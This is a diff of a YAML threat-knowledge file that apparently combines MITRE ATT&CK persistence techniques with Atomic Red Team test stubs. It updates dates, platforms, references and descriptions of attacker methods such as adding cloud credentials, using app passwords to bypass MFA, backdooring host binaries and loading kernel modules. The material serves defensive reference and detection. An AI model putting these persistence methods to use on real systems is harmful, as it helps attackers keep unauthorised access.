       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31855,7 +32255,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31931,7 +32330,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -31959,8 +32358,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -31986,7 +32383,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32011,23 +32408,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -32037,11 +32432,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -32052,12 +32451,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -32066,6 +32472,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -32074,13 +32481,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -32106,10 +32516,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -32118,10 +32536,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32138,14 +32566,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32220,7 +32645,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32309,24 +32733,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32340,7 +32767,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32355,6 +32782,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32368,11 +32800,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32398,7 +32829,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32412,7 +32842,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32439,8 +32868,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32451,7 +32880,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32492,7 +32922,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32512,12 +32942,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32571,11 +33000,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32662,9 +33090,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32677,12 +33105,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32695,9 +33122,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32706,13 +33135,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32760,14 +33189,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32803,16 +33229,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32853,7 +33278,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Azure - adding user to Azure role in subscription
@@ -33015,138 +33439,137 @@ persistence:
         elevation_required: false
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
